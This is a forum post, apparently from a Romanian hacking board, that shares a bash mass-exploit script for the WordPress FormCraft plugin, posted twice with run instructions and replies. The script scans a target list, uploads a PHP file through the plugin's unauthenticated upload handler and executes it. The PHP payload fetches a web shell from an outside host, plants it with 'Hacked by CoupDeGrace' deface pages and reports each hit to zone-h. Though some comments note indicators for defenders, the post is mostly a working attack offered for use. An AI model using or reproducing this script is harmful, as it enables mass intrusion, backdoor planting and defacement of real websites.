Aerosol

Wordpress Plugin Formcraft Exploiter [BASH]


Credits to: CoupDeGrace

#!/bin/bash
#Coded By Gantengers Crews ?2013-2014

# Interactive setup: ask for the name of the host-list file and stop when that
# name is not a regular file.
read -p "List Target = " list
if [ ! -f $list ];then
echo " + List target tdk ada cuk.. "
exit
fi
# Per-run prefix for the scratch files created under tmp/.
FCK=$RANDOM
# Working directories: tmp/ holds fetched responses, log/ holds the result lists
# (log/postOK.txt, log/postError.txt and log/defaced.txt are written by ZoneH).
if [ ! -d tmp ];then
mkdir tmp
fi
if [ ! -d log ];then
mkdir log
fi

# Creates cdg.php, the PHP file uploaded by Coupdegrace, unless a file of that
# name already exists in the working directory.
# Behaviour visible in the payload, useful as indicators when triaging a host:
#   - fetches remote content from http://coup-de-grace.org/wso.txt
#   - writes lol.html (title "Hacked by CoupDeGrace") into the document root,
#     images/ and wp-content/
#   - writes the fetched content as cdg.php into the same three locations
#   - prints "CoupDeGrace" and then removes itself with unlink(__FILE__), so the
#     originally uploaded copy will not remain in the plugin's files/ directory
# The heredoc delimiter is unquoted, which is why every PHP "$" is written "\$".
if [ ! -f cdg.php ];then
cat > cdg.php <<_EOF
<?php \$sh = file_get_contents("http://coup-de-grace.org/wso.txt");\$file="<title>Hacked by CoupDeGrace</title><center><div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php <style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}"; \$path = \$_SERVER["DOCUMENT_ROOT"]; \$r=fopen(\$path."/lol.html", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/images/lol.html", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/wp-content/lol.html", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/cdg.php", "w");fwrite(\$r,\$sh);fclose(\$r);\$r=fopen(\$path."/images/cdg.php", "w");fwrite(\$r,\$sh);fclose(\$r);\$r=fopen(\$path."/wp-content/cdg.php", "w");fwrite(\$r,\$sh);fclose(\$r);echo CoupDeGrace;unlink(__FILE__); ?>
_EOF
fi

# CekDFC URL FLAG
# Fetches URL and checks the response for the marker "Hacked by CoupDeGrace"
# (case-insensitive). On a match with FLAG equal to 1, the URL is appended to
# hacked.txt, written to tmp/empes.txt, and ZoneH is called.
# Globals: FCK (read) - scratch-file prefix.
# Detection note: the request uses the fixed MSIE 9.0 User-Agent string below and
# a 10-second timeout.
CekDFC(){
czone=${2}
# Drop leftovers from a previous call so a stale file cannot be mistaken for a
# fresh response.
if [ -f tmp/${FCK}gck.txt ];then
rm -f tmp/${FCK}gck.txt
fi
if [ -f tmp/${FCK}hasil.txt ];then
rm -f tmp/${FCK}hasil.txt
fi
curl --silent --max-time 10 --connect-timeout 10 -A "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)" "${1}" -o tmp/${FCK}gck.txt
if [ -f tmp/${FCK}gck.txt ];then
# gck is grep's exit status: 0 means the marker string was present.
cat tmp/${FCK}gck.txt | grep -i "Hacked by CoupDeGrace" >/dev/null;gck=$?
if [ $gck -eq 0 ];then
echo " + File found $1"
if [ $czone -eq 1 ];then
echo $1 >> hacked.txt
# tmp/empes.txt is how the URL is handed over to ZoneH.
echo ${1} > tmp/empes.txt
ZoneH
fi
fi
fi
}


# CekDFC5 URL
# Requests URL (the uploaded PHP file, per the caller) and checks whether the
# response contains "CoupDeGrace" (case-insensitive). On a match it prints a
# success message and calls CekDFC for /lol.html and /wp-content/lol.html on the
# same host.
# Globals: FCK (read), HOSTX (read).
# Detection note: a GET to this URL is what executes the uploaded file, so it
# appears in access logs directly after the upload POST.
CekDFC5(){
#echo " - check file $1"
curl --silent --max-time 10 --connect-timeout 10 "${1}" -o tmp/${FCK}w00t
# cwot is grep's exit status: 0 means the string was found in the response.
cat tmp/${FCK}w00t | grep -i "CoupDeGrace" >/dev/null;cwot=$?
if [ $cwot -eq 0 ];then
echo " + Exploit Berhasil Dilakukan"
CekDFC "http://${HOSTX}/lol.html" 1
CekDFC "http://${HOSTX}/wp-content/lol.html" 1
fi
}


# ZoneH
# Reads the URL stored in tmp/empes.txt and submits it to the zone-h.org
# notification form under the name "CoupDeGrace", then records the outcome.
# Globals: FCK (read), HOSTX (read).
# Files written: log/postOK.txt or log/postError.txt depending on the parsed
# reply, and log/defaced.txt in both cases.
ZoneH(){
if [ -f "tmp/empes.txt" ];then
urlnya=$(cat tmp/empes.txt)
# Form POST with fixed browser-like headers; the reply is saved for parsing.
curl --silent -d "defacer=CoupDeGrace&domain1=${urlnya}&hackmode=15&reason=1" \
--header "Host: www.zone-h.org" \
--header "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0" \
--header "Accept-Language: en-US,en;q=0.5" \
--header "Connection: keep-alive" \
--header "Referer: http://zone-h.org/notify/single" \
--request POST "http://zone-h.org/notify/single" -o tmp/${FCK}result1.txt >/dev/null
# Flatten the reply to one line, split it at <li> and </li>, keep the piece that
# contains name="domain, turn < and > into ?, and keep the 5th ?-separated field.
cat tmp/${FCK}result1.txt | sed ':a;N;$!ba;s/\n/ /g' | awk '{gsub("<li>","\n")}1' | awk '{gsub("</li>","\n")}1' | grep "name=\"domain" | awk '{gsub(">","?")}1' | awk '{gsub("<","?")}1' | cut -d '?' -f 5 > tmp/${FCK}Result.txt
FILEDX="tmp/${FCK}Result.txt"
# Only the first extracted line is examined.
RDOM1=$(sed -n '1p' < $FILEDX)
# warnai is grep's exit status: 0 when that line contains "OK" in any letter case.
echo $RDOM1 | grep -i "OK" >> /dev/null;warnai=$?
if [ $warnai -eq 0 ];then
echo "$urlnya" >> log/postOK.txt
echo "Upload web $urlnya ke Zone-H: OK"
else
echo "$urlnya" >> log/postError.txt
echo "=> Upload to Zone-H $urlnya : ERROR"
echo "=> Shell berhasil di upload Mblo http://${HOSTX}/wp-content/cdg.php?ina"
fi
echo "$urlnya" >> log/defaced.txt
fi
continue
}

# Coupdegrace
# Sends the local cdg.php as multipart form field "files[]" to the FormCraft
# plugin's file-upload handler on HOSTX, then calls CekDFC5 on the path where the
# file is expected to land (file-upload/server/php/files/cdg.php).
# Globals: FCK (read), HOSTX (read).
# NOTE(review): the request carries no cookies or credentials, so the handler
# appears to accept unauthenticated uploads - confirm against the plugin version
# in use. Defender view: look for POSTs to .../formcraft/file-upload/server/php/index.php
# followed by GETs under .../server/php/files/, remove or update the plugin, and
# disable PHP execution in upload directories.
Coupdegrace(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/${FCK}resp.txt \
-A "Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-F "files[]=@cdg.php" \
--request POST "http://${HOSTX}/wp-content/plugins/formcraft/file-upload/server/php/index.php"
CekDFC5 "http://${HOSTX}/wp-content/plugins/formcraft/file-upload/server/php/files/cdg.php"
}

# Scan PATH PATTERN ACTION
# Fetches http://HOSTX + XDIR + PATH and greps the response for PATTERN. On a
# match it prints " + Found" and runs ACTION as a command; otherwise it prints
# " - Not found". If no response file was written it prints " - RTO".
# Globals: FCK (read), HOSTX (read), XDIR (read; not assigned anywhere in the
# visible script).
# Detection note: the probe is a GET for the plugin's jquery.fileupload.js with
# the fixed MSIE 9.0 User-Agent string below (path supplied by the caller).
Scan(){
curl --silent --max-time 10 --connect-timeout 10 -A "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)" "http://${HOSTX}${XDIR}${1}" -o tmp/${FCK}cvuln
if [ -f tmp/${FCK}cvuln ];then
# csexy is grep's exit status: 0 means PATTERN occurred in the fetched file.
cat tmp/${FCK}cvuln | grep "$2" >/dev/null;csexy=$?
if [ $csexy -eq 0 ];then
echo " + Found ${HOSTX}"
# The third argument is executed as a command name.
$3
else
echo " - Not found ${HOSTX}"
fi
else
echo " - RTO"
fi
# Remove every scratch file of this run before returning.
rm -f tmp/${FCK}*
}

for HOST in `cat $list`
do
HOSTX=$(echo $HOST | awk '{gsub("http://","")}1')
Scan "/wp-content/plugins/formcraft/file-upload/js/jquery.fileupload.js" "support.xhrFormDataFileUpload" "Coupdegrace"

N5xV4pQ.png

save the script with .sh format

run the command bash namafile.sh and enter your target list

Edited by Aerosol

@quadxenon daca nu esti in stare sa faci nici macar atat, scuze dar locul tau nu e aici.

era o problema si anume

Scan "/wp-content/plugins/formcraft/file-upload/js/jquery.fileupload.js" "support.xhrFormDataFileUpload" "Coupdegrace"

trebuia inclusa.

#!/bin/bash
#Coded By Gantengers Crews ?2013-2014

# Interactive setup: ask for the name of the host-list file and stop when that
# name is not a regular file.
read -p "List Target = " list
if [ ! -f $list ];then
echo " + List target tdk ada cuk.. "
exit
fi
# Per-run prefix for the scratch files created under tmp/.
FCK=$RANDOM
# Working directories: tmp/ holds fetched responses, log/ holds the result lists
# (log/postOK.txt, log/postError.txt and log/defaced.txt are written by ZoneH).
if [ ! -d tmp ];then
mkdir tmp
fi
if [ ! -d log ];then
mkdir log
fi

# Creates cdg.php, the PHP file uploaded by Coupdegrace, unless a file of that
# name already exists in the working directory.
# Behaviour visible in the payload, useful as indicators when triaging a host:
#   - fetches remote content from http://coup-de-grace.org/wso.txt
#   - writes lol.html (title "Hacked by CoupDeGrace") into the document root,
#     images/ and wp-content/
#   - writes the fetched content as cdg.php into the same three locations
#   - prints "CoupDeGrace" and then removes itself with unlink(__FILE__), so the
#     originally uploaded copy will not remain in the plugin's files/ directory
# The heredoc delimiter is unquoted, which is why every PHP "$" is written "\$".
if [ ! -f cdg.php ];then
cat > cdg.php <<_EOF
<?php \$sh = file_get_contents("http://coup-de-grace.org/wso.txt");\$file="<title>Hacked by CoupDeGrace</title><center><div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php <style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}"; \$path = \$_SERVER["DOCUMENT_ROOT"]; \$r=fopen(\$path."/lol.html", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/images/lol.html", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/wp-content/lol.html", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/cdg.php", "w");fwrite(\$r,\$sh);fclose(\$r);\$r=fopen(\$path."/images/cdg.php", "w");fwrite(\$r,\$sh);fclose(\$r);\$r=fopen(\$path."/wp-content/cdg.php", "w");fwrite(\$r,\$sh);fclose(\$r);echo CoupDeGrace;unlink(__FILE__); ?>
_EOF
fi

# CekDFC URL FLAG
# Fetches URL and checks the response for the marker "Hacked by CoupDeGrace"
# (case-insensitive). On a match with FLAG equal to 1, the URL is appended to
# hacked.txt, written to tmp/empes.txt, and ZoneH is called.
# Globals: FCK (read) - scratch-file prefix.
# Detection note: the request uses the fixed MSIE 9.0 User-Agent string below and
# a 10-second timeout.
CekDFC(){
czone=${2}
# Drop leftovers from a previous call so a stale file cannot be mistaken for a
# fresh response.
if [ -f tmp/${FCK}gck.txt ];then
rm -f tmp/${FCK}gck.txt
fi
if [ -f tmp/${FCK}hasil.txt ];then
rm -f tmp/${FCK}hasil.txt
fi
curl --silent --max-time 10 --connect-timeout 10 -A "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)" "${1}" -o tmp/${FCK}gck.txt
if [ -f tmp/${FCK}gck.txt ];then
# gck is grep's exit status: 0 means the marker string was present.
cat tmp/${FCK}gck.txt | grep -i "Hacked by CoupDeGrace" >/dev/null;gck=$?
if [ $gck -eq 0 ];then
echo " + File found $1"
if [ $czone -eq 1 ];then
echo $1 >> hacked.txt
# tmp/empes.txt is how the URL is handed over to ZoneH.
echo ${1} > tmp/empes.txt
ZoneH
fi
fi
fi
}


# CekDFC5 URL
# Requests URL (the uploaded PHP file, per the caller) and checks whether the
# response contains "CoupDeGrace" (case-insensitive). On a match it prints a
# success message and calls CekDFC for /lol.html and /wp-content/lol.html on the
# same host.
# Globals: FCK (read), HOSTX (read).
# Detection note: a GET to this URL is what executes the uploaded file, so it
# appears in access logs directly after the upload POST.
CekDFC5(){
#echo " - check file $1"
curl --silent --max-time 10 --connect-timeout 10 "${1}" -o tmp/${FCK}w00t
# cwot is grep's exit status: 0 means the string was found in the response.
cat tmp/${FCK}w00t | grep -i "CoupDeGrace" >/dev/null;cwot=$?
if [ $cwot -eq 0 ];then
echo " + Exploit Berhasil Dilakukan"
CekDFC "http://${HOSTX}/lol.html" 1
CekDFC "http://${HOSTX}/wp-content/lol.html" 1
fi
}


# ZoneH
# Reads the URL stored in tmp/empes.txt and submits it to the zone-h.org
# notification form under the name "CoupDeGrace", then records the outcome.
# Globals: FCK (read), HOSTX (read).
# Files written: log/postOK.txt or log/postError.txt depending on the parsed
# reply, and log/defaced.txt in both cases.
ZoneH(){
if [ -f "tmp/empes.txt" ];then
urlnya=$(cat tmp/empes.txt)
# Form POST with fixed browser-like headers; the reply is saved for parsing.
curl --silent -d "defacer=CoupDeGrace&domain1=${urlnya}&hackmode=15&reason=1" \
--header "Host: www.zone-h.org" \
--header "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0" \
--header "Accept-Language: en-US,en;q=0.5" \
--header "Connection: keep-alive" \
--header "Referer: http://zone-h.org/notify/single" \
--request POST "http://zone-h.org/notify/single" -o tmp/${FCK}result1.txt >/dev/null
# Flatten the reply to one line, split it at <li> and </li>, keep the piece that
# contains name="domain, turn < and > into ?, and keep the 5th ?-separated field.
cat tmp/${FCK}result1.txt | sed ':a;N;$!ba;s/\n/ /g' | awk '{gsub("<li>","\n")}1' | awk '{gsub("</li>","\n")}1' | grep "name=\"domain" | awk '{gsub(">","?")}1' | awk '{gsub("<","?")}1' | cut -d '?' -f 5 > tmp/${FCK}Result.txt
FILEDX="tmp/${FCK}Result.txt"
# Only the first extracted line is examined.
RDOM1=$(sed -n '1p' < $FILEDX)
# warnai is grep's exit status: 0 when that line contains "OK" in any letter case.
echo $RDOM1 | grep -i "OK" >> /dev/null;warnai=$?
if [ $warnai -eq 0 ];then
echo "$urlnya" >> log/postOK.txt
echo "Upload web $urlnya ke Zone-H: OK"
else
echo "$urlnya" >> log/postError.txt
echo "=> Upload to Zone-H $urlnya : ERROR"
echo "=> Shell berhasil di upload Mblo http://${HOSTX}/wp-content/cdg.php?ina"
fi
echo "$urlnya" >> log/defaced.txt
fi
continue
}

# Coupdegrace
# Sends the local cdg.php as multipart form field "files[]" to the FormCraft
# plugin's file-upload handler on HOSTX, then calls CekDFC5 on the path where the
# file is expected to land (file-upload/server/php/files/cdg.php).
# Globals: FCK (read), HOSTX (read).
# NOTE(review): the request carries no cookies or credentials, so the handler
# appears to accept unauthenticated uploads - confirm against the plugin version
# in use. Defender view: look for POSTs to .../formcraft/file-upload/server/php/index.php
# followed by GETs under .../server/php/files/, remove or update the plugin, and
# disable PHP execution in upload directories.
Coupdegrace(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/${FCK}resp.txt \
-A "Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-F "files[]=@cdg.php" \
--request POST "http://${HOSTX}/wp-content/plugins/formcraft/file-upload/server/php/index.php"
CekDFC5 "http://${HOSTX}/wp-content/plugins/formcraft/file-upload/server/php/files/cdg.php"
}

# Scan PATH PATTERN ACTION
# Fetches http://HOSTX + XDIR + PATH and greps the response for PATTERN. On a
# match it prints " + Found" and runs ACTION as a command; otherwise it prints
# " - Not found". If no response file was written it prints " - RTO".
# Globals: FCK (read), HOSTX (read), XDIR (read; not assigned anywhere in the
# visible script).
# Detection note: the probe is a GET for the plugin's jquery.fileupload.js with
# the fixed MSIE 9.0 User-Agent string below (path supplied by the caller).
Scan(){
curl --silent --max-time 10 --connect-timeout 10 -A "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)" "http://${HOSTX}${XDIR}${1}" -o tmp/${FCK}cvuln
if [ -f tmp/${FCK}cvuln ];then
# csexy is grep's exit status: 0 means PATTERN occurred in the fetched file.
cat tmp/${FCK}cvuln | grep "$2" >/dev/null;csexy=$?
if [ $csexy -eq 0 ];then
echo " + Found ${HOSTX}"
# The third argument is executed as a command name.
$3
else
echo " - Not found ${HOSTX}"
fi
else
echo " - RTO"
fi
# Remove every scratch file of this run before returning.
rm -f tmp/${FCK}*
}

for HOST in `cat $list`
do
HOSTX=$(echo $HOST | awk '{gsub("http://","")}1')
Scan "/wp-content/plugins/formcraft/file-upload/js/jquery.fileupload.js" "support.xhrFormDataFileUpload" "Coupdegrace"

cat despre testat acesta nu l-am testat fiindca e luat de pe un site de incredere.

Pe viitor te-as ruga sa nu mai faci offtopic la posturile mele...

Edited by Aerosol